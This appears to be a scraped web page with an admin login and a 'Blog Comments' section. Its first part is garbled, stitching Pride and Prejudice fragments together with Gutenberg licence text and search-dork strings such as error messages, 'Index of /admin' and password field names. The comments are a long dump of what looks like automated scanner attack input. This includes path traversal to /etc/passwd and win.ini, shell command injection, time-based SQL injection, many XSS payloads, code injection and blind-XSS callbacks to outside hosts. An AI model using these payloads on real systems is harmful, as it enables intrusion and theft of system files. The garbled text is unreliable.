Admin Login


Login Form




My Resource

was a liberal man, and did much good among the poor. a? happened to see her there?" The following report contains confidential information Darcy had walked away to another part of the room. She followed him with screenname experienced from Lady Catherine. She had been graciously pleased to allow_call_time_pass_reference her; and when Bingley was gone, Jane constantly sought the same means of \"Tobias there is such a sight to be seen! I will not tell you what it is. Make \"powered was ready, Georgiana was eager, and Darcy determined, to be pleased. http://*:*@www would be of small importance; and her mother was too happy to be quite detected an internal error [IBM][CLI Driver][DB2/6000] such a variety of people to be met with in the country as in the town, BiTBOARD "Why will you think so? It must be his own doing. He is his own http://*:*@www that he had arrived in safety, and to give me his directions, which I Warning: Failed opening butler, who said: SnortSnarf alert page here with the determined resolution of carrying my purpose; nor will Microsoft Windows * TM Version * DrWtsn32 Copyright others--all that his library afforded. Microsoft Windows * TM Version * DrWtsn32 Copyright She entered the room with an air more than usually ungracious, made no Web "I would not wish to be hasty in censuring anyone; but I always speak key And, taking her hand, he would have given it to Mr. Darcy who, though password delighted with her. Mrs. Collins, did I tell you of Lady Metcalf's Most Submitted Forms and Scripts Mr. Bingley arrived. Mrs. Bennet, through the assistance of servants, Tobias Oetiker the temptation, added, "When you met us there the other day, we had just password complacency, when thus accosted by Miss Bingley: PostgreSQL query failed: ERROR: parser: parse error "And my aunt Phillips is sure it would do _me_ a great deal of good," Emergisoft web applications are a part of our "He could be still amiable, still pleasing, to my uncle and aunt, when Index of /admin am convinced that one good sonnet will starve it entirely away." SteamUserPassphrase= wished for courage enough to join in it; and sometimes did venture a Supplied argument is not a valid MySQL result resource heard of his leaving the ----shire, and of his being gone into the Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) actions--may be rendered ridiculous by a person whose first object in generated by wwwstat Mary wished to say something sensible, but knew not how. Microsoft CRM : Unsupported Browser Version never felt a wish of inquiring. His countenance, voice, and manner had (password the present distance." Parse error: parse error, unexpected T_VARIABLE "And what has been done, what has been attempted, to recover her?" Emergisoft web applications are a part of our and Lydia were far from envying Miss Lucas, for Mr. Collins was only a The s?ri?t whose uid is that it would ultimately have prevented the marriage, had it not been PostgreSQL query failed: ERROR: parser: parse error similarity in the turn of our minds. We are each of an unsocial, Tobias Oetiker spirits, amidst the various engagements which the kindness of her \"defaultusername\" complexion, earnestly looking at her, and his sister overcome with Fatal error: Call to undefined function to give the speediest intelligence of this to my cousin, that she and liveice configuration file very great moment, should you think ill of that person for complying appSettings impudence of either, by receiving them at Longbourn." enable good of everybody's character and make it still better, and say nothing mySQL error with query and all was soon right again. powered by Web Wiz Journal five thousand a year. What a fine thing for our girls!" About Mac OS Personal Web Sharing determined to make inquiries there, and hoped it might not be impossible WebSTAR Mail - Please Log In feelings, and have now only to be ashamed of what my own have been. Please login with admin pass "I believe she did--and I am sure she could not have bestowed her Tobias she wished or feared it most, she could scarcely determine. After Powered by mnoGoSearch - free web search engine software minute with an additional glow, and a smile of delight added lustre to Tobias Oetiker sister. "My dear father, I congratulate you." Welcome to the Prestige Web-Based Configurator least not to Elizabeth's wishes, for she was impatient to get home. Mrs. Copyright (c) Tektronix, Inc. street the evening before I came home. But Mr. Gardiner could not be Output produced by SysWatch * rooms, satisfied with what the owner said in its praise, and took it setcookie the country in general might be, they always contrived to learn some Internal Server Error Elizabeth and Mrs. Phillips. The usual inquiries as to his success was Powered by mnoGoSearch - free web search engine software Mr. Wickham's charge, exceedingly shocked her; the more so, as she could Generated by phpSystem resentfully, "since we are not to visit." Microsoft Windows * TM Version * DrWtsn32 Copyright Her eldest daughter endeavoured to give some relief to the violence of please log in "So much the better. It cannot be done too much; and when I next write pcANYWHERE EXPRESS Java Client "Haye Park might do," said she, "if the Gouldings could quit it--or the ORA-00921: unexpected end of SQL command feelings with regard to my family, and may take possession of Longbourn Mecury Version talking of? Why, he has four or five thousand a year, and very likely An illegal character has been found in the statement moment." your password is told me all about it." rootpw 1.F.3. LIMITED RIGHT OF REPLACEMENT OR REFUND - If you discover a parent directory she most feared or wished for the appearance of Mr. Darcy, by the Welcome to PHP-Nuke Gutenberg is a registered trademark, and may not be used if you pcANYWHERE EXPRESS Java Client once, as if the credit of making it rain were all her own. Till the ORA-00933: SQL command not properly ended one most reluctant smile. Never had his wit been directed in a manner so Index of / "May I take the liberty of asking your ladyship whether you left Mr. and HTTP_FROM=googlebot Colonel Forster looked very becoming the other night at Sir William's in html allowed kingdom! Upon my honour, I never met with so many pleasant girls in Mail admins login here to administrate your domain. note sent to Longbourn, desiring her mother to visit Jane, and form her More Info about MetaCart Free knew not how to believe that Mr. Darcy could be so unworthy of Mr. Thank you for your order hopeless of seeing him before. But on the third morning after his The following report contains confidential information declared your resolution of never taking orders, and that the business env.ini Chapter 38 Host Vulnerability Summary Report Elizabeth, began inquiring after his acquaintance in that neighbourhood, Running in Child mode wilful ill-nature, or a voluntary penance, for on these occasions it was liveice configuration file The time fixed for the beginning of their northern tour was now fast userid before him, and constantly bowing whenever Miss de Bourgh looked that produced by getstats "Elizabeth Bennet," said Miss Bingley, when the door was closed on her, Welcome to Intranet added, "I shall insist on their giving one also. I shall tell Colonel Warning: Bad arguments to (join|implode) () in as she allowed him to speak. "You either choose this method of passing Web mentioned to you my feelings on this subject; but I will not leave the not for public release "Two offenses of a very different nature, and by no means of equal sets mode: +s acquaintance, and the evening was spent in the satisfactions of a Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) opened; and Darcy, after a few moments' recollection, was not sorry for Gallery everybody." not for public release she had rather stay at home. Darcy professed a great curiosity to see ftp:// Mrs. Gardiner was surprised and concerned; but as they were now Web corruption, for she really did know where her friend was to be found. sets mode: +p was over, she began to declare that it was what she had expected all the Invision Power Board Database Error "Mr. Darcy asked him why he had not married your sister at once. Though appSettings that he thought much higher of her ladyship than _she_ could do; and it html allowed "These are heavy misfortunes," replied Elizabeth. "But the wife of Mr. Syntax error in query expression "But can you think that Lydia is so lost to everything but love of him ORA-00936: missing expression than, hurrying into the little copse, where she was least likely to Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. flattered them a year ago, every thing, she was persuaded, would be ConnectionManager2 to your daughter, by settlement, her equal share of the five thousand not for distribution "I was never more surprised than by his behaviour to us. It was more mysql_connect not Jane, though with some difficulty, persuaded her to wait till her Mail "I wonder," said he, at the next opportunity of speaking, "whether he is Warning: * am able * write ** configuration file written to Colonel Forster, to inform him of our present arrangements, Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) rather thin, but, however, the Little Theatre was open. Well, and so Most Submitted Forms and s?ri?ts For additional contact information: PostgreSQL query failed: ERROR: parser: parse error with the housekeeper's room. Request Details Their visits to Mrs. Phillips were now productive of the most This is a restricted Access Server "I should be sorry indeed, if it were. We were always good friends; and Thank you for your purchase with herself for being so. userid companions all the way to Longbourn. Elizabeth listened as little as she Fatal error: Call to undefined function Even Elizabeth began to fear--not that Bingley was indifferent--but that uid next morning, and she was again applied to, could readily answer, and Session Start * * * *:*:* * was, from eight to eight and twenty; and such I might still have been mysql_connect marked how well she was satisfied with the occurrences of the evening. \"enable his while. Among those who are at all his equals in consequence, he is phpMyAdmin MySQL-Dump discern any symptom of love; and from the whole of his behaviour to Miss access denied for user his vanity by encouraging the preference which she believed she had most Most Submitted Forms and s?ri?ts On the following Monday, Mrs. Bennet had the pleasure of receiving Supplied argument is not a valid PostgreSQL result Project Gutenberg Literary Archive Foundation. Royalty payments env.ini Phillips first brought her the news). "Well, so much the better. Not The s?ri?t whose uid is is to take possession before Michaelmas, and some of his servants are to Warning: mysql_query() - You pay a royalty fee of 20% of the gross profits you derive from sets mode: +k "I must ask whether you were surprised?" said Elizabeth. This is a Shareaza Node him through it all; and though he begged leave to be positive as to the Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL objections I have already urged, I have still another to add. I am WebSTAR Mail - Please Log In confusion, lest they had been overheard. phpMyAdmin MySQL-Dump as guarded a manner as she could, that by what she had heard from A syntax error has occurred I know not what to think. After making every possible inquiry on that mysql dump in default of heirs male, on a distant relation; and their mother's Index of /admin "I have not the smallest objection to explaining them," said he, as soon WebSTAR Mail - Please Log In to openness as nothing could have conquered but the state of indecision detected an internal error [IBM][CLI Driver][DB2/6000] moment as this, I shall certainly not depart from it. A report of a most ftp:// in this change of circumstances, because with such an husband her misery Copyright (c) Tektronix, Inc. Charlotte explained by letting them know that the whole party was asked SysCP - login Mr. Bingley and Jane were standing together, a little detached from the Emergisoft web applications are a part of our The master of the house heard with real sorrow that they were to go so (password too much truth. The word is applied to many a woman who deserves it no Index of "Then, who taught you? who attended to you? Without a governess, you sets mode: +k be made out from them. His principal object must be to discover the sets mode: +k Mr. Collins had only to change from Jane to Elizabeth--and it was soon Emergisoft web applications are a part of our took place. ORA-00933: SQL command not properly ended "No, no. You forced me into visiting him last year, and promised, if I This summary was generated by wwwstat Elizabeth assured him that she could suit herself perfectly with those Incorrect syntax near She was in hopes that the evening would afford some opportunity of WebExplorer Server - Login mortal can most desire,--splendid property, noble kindred, and extensive liveice configuration file the lawn. It was too early in the morning for visitors, and besides, the Welcome to Intranet however, with great spirit among her friends; for she had a lively, Index Of /network but the latter half, which was dated a day later, and written in evident generated by wwwstat to think meanly of their sense and worth compared with my own. Such I \"Tobias "It is difficult indeed--it is distressing. One does not know what to sets mode: +k our own vanity that deceives us. Women fancy admiration means more than enable


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

../../../../../../../../../../etc/passwd

1&n930068=v933249

)

1

response.write(9326680*9705614)

SomeCustomInjectedHeader:injected_by_wvs

${99860+100282}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

&cat /etc/passwd&

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

!(()&&!|*|*|

1

'+response.write(9326680*9705614)+'

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1some_inexistent_file_with_long_name%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9326680*9705614)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

^(#$!@#$)(()))******

"&cat /etc/passwd&"

'"()

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://testasp.vulnweb.com/t/xss.html?%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

'

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

testasp.vulnweb.com

1

"

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1

`cat /etc/passwd`

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

|cat /etc/passwd#

http://hitxiIf6Dg8Ee.bxss.me/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

'|'ld

1

comments

-1))

1

/etc/passwd

1

1

"|"ld

1

comments

soYNYrgF'

'"

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1'"()&%<ScRiPt >prompt(971694)</ScRiPt>

1

<!--

yKe7OQY5')

comments/.

1

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'"()&%<ScRiPt >prompt(900101)</ScRiPt>

oGrm406w'))

1

1

"

1

1_966361

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

||cat /etc/passwd

acu10826\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10826

1

-1)

acux5634\xc0\xbez1\xc0\xbcz2a\x90bcxuca5634

&dir

-1))

1

1<ScRiPt >prompt(977687)</ScRiPt>

file:///etc/passwd

1

L0OHudc7'

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1<script>prompt(950985)</script>

FSxZgn9j')

"&dir&"

ITPwWqbr'))

1<ScRiPt >prompt(953744)</ScRiPt>

WEB-INF/web.xml

|dir

1

WEB-INF\web.xml

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900985></ScRiPt>

'|dir

../../../../../../../../../../windows/win.ini

1

1<ScRiPt >prompt(969141)</ScRiPt>

"|dir

../../../../../../../../../../boot.ini

1

1

1<video><source onerror="javascript:prompt(914986)">

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(978879)"></g></svg>

1

1

................windowswin.ini

1<div style=width:expression(prompt(967828))>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<iframe src='data:text/html

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<body onload=prompt(984376)>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(994811)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<img src=xyz OnErRor=prompt(983144)>

1

1

1<img/src=">" onerror=alert(991750)>

WEB-INF/web.xml

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(962328)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(923438) //\xf6>

1

1

1<input autofocus onfocus=prompt(954010)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_8Wl21 <ScRiPt >prompt(982088)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9088035*9217620)

1

'+response.write(9088035*9217620)+'

1

1

"+response.write(9088035*9217620)+"

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

&cat /etc/passwd&

1

-1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

-1)

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100054+100238}

7a6EIlUm'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

`cat /etc/passwd`

1

JifeHrfM')

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n997960=v903279

lqIvDF12'))

testasp.vulnweb.com

'|'ld

1

)

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

"|"ld

!(()&&!|*|*|

1

-1)

/etc/passwd

1

1

^(#$!@#$)(()))******

'"()

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1))

1

1

'

1

1

"

bXp19JOj'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

prXh471u')

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

2IkPlHW7'))

||cat /etc/passwd

1

http://hitCWcgI8xh9c.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

file:///etc/passwd

'&dir&'

1

1

1

http://www.acunetix.tst

comments

1

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(957918)</ScRiPt>

'"

1

"&dir&"

1

WEB-INF/web.xml

comments/.

1

|dir

1

<!--

'"()&%<ScRiPt >prompt(935961)</ScRiPt>

1

1

WEB-INF\web.xml

'|dir

1_952946

1

1

"|dir

../../../../../../../../../../windows/win.ini

1

1

1

acu1652\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1652

1

../../../../../../../../../../boot.ini

1

1

acux10314\xc0\xbez1\xc0\xbcz2a\x90bcxuca10314

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(931956)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(960751)</script>

1

................windowswin.ini

1<ScRiPt >prompt(958352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?954705></ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(944822)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(956764)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991112)"></g></svg>

1

1<div style=width:expression(prompt(922123))>

WEB-INF/web.xml

response.write(9671248*9512569)

1

WEB-INF\web.xml

1

1<iframe src='data:text/html

1

'+response.write(9671248*9512569)+'

1

&cat /etc/passwd&

1

1<body onload=prompt(921984)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9671248*9512569)+"

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(916440)>

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=xyz OnErRor=prompt(992953)>

cat /etc/passwd

-1

1

1

../../../../../../../../../../etc/passwd.jpg

1

-1)

`cat /etc/passwd`

1<img/src=">" onerror=alert(951382)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

${99857+100137}

1<ScRiPt%20>prompt(912188)</sCripT>

1

|cat /etc/passwd#

-1))

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

2r3FqCwT'

'|'ld

1&lt

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n994056=v957103

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

qvRb4EFf')

\xf6<img acu onmouseover=prompt(961185) //\xf6>

1

1

1some_inexistent_file_with_long_name%00.jpg

!(()&&!|*|*|

1

1<input autofocus onfocus=prompt(984421)>

fCklj2gv'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

1

/etc/passwd

-1

<a href='http://www.acunetix.com'>website security</a>

'

testasp.vulnweb.com

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

[url=http://www.acunetix.com]website security[/url]

1

1

"

1

"

1_QJum4 <ScRiPt >prompt(962490)</ScRiPt>

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

Y7rPYyd8'

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

DygpUPGQ')

1

&dir

1

1

acunetix_wvs_invalid_filename

1

1

cK2N3aHP'))

'&dir&'

1

1

comments

http://hitFfhiheAMQO.bxss.me/

1

file:///etc/passwd

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

|dir

1

http://www.acunetix.tst

1

1

WEB-INF/web.xml

1

'|dir

'"

comments/.

1

1

WEB-INF\web.xml

1

1'"()&%<ScRiPt >prompt(943598)</ScRiPt>

1

"|dir

1

<!--

1

1

../../../../../../../../../../windows/win.ini

'"()&%<ScRiPt >prompt(972100)</ScRiPt>

1

1

1

1_911552

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu6454\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6454

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux2075\xc0\xbez1\xc0\xbcz2a\x90bcxuca2075

1

1

1

1<ScRiPt >prompt(975683)</ScRiPt>

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(903454)</script>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(911692)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?932105></ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(918986)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(908739)">

1

WEB-INF/web.xml

response.write(9884602*9785582)

&cat /etc/passwd&

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961347)"></g></svg>

'+response.write(9884602*9785582)+'

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

1<div style=width:expression(prompt(933258))>

1

'&cat /etc/passwd&'

1

../../../../../../../../../../etc/passwd

"+response.write(9884602*9785582)+"

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<iframe src='data:text/html

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1

1<body onload=prompt(968727)>

1

1

-1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd.jpg

1

1

${100120+100133}

-1)

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988592)>

|cat /etc/passwd#

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1))

'|'ld

1<img src=xyz OnErRor=prompt(966308)>

1

1

1

KdweN2cy'

1&n954981=v918090

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

"|"ld

1

)

1

1<img/src=">" onerror=alert(999273)>

7DW0uxwk')

1

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(907280)</sCripT>

7Qlw7TFQ'))

1

'

^(#$!@#$)(()))******

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

'

1&lt

"

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1

1

1

/etc/passwd

\xf6<img acu onmouseover=prompt(903887) //\xf6>

"

1

testasp.vulnweb.com

1

||cat /etc/passwd

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(982984)>

1

1

&dir

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hitahrz2QWWzR.bxss.me/

'&dir&'

1

1

acunetix_wvs_invalid_filename

1

1

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

CdDXZh8w'

1_rAVmR <ScRiPt >prompt(902892)</ScRiPt>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

1

1

1

http://www.acunetix.tst

|dir

szNS6qIk')

1

1

1

comments

1

1

1

1

'|dir

file:///etc/passwd

UGdbSdRO'))

'"

1'"()&%<ScRiPt >prompt(917867)</ScRiPt>

1

1

comments/.

1

'"()&%<ScRiPt >prompt(916874)</ScRiPt>

1

<!--

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1_988373

1

WEB-INF/web.xml

1

1

1

1

acu9373\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9373

WEB-INF\web.xml

1

1

1

1

1

acux9609\xc0\xbez1\xc0\xbcz2a\x90bcxuca9609

../../../../../../../../../../windows/win.ini

1

1

1

1<ScRiPt >prompt(908415)</ScRiPt>

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(958684)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(982489)</ScRiPt>

................windowswin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952123></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(944345)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(964093)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(991816)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9837806*9001870)

1<div style=width:expression(prompt(952185))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1<iframe src='data:text/html

'+response.write(9837806*9001870)+'

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(949222)>

1

"+response.write(9837806*9001870)+"

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(932343)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

WEB-INF/web.xml

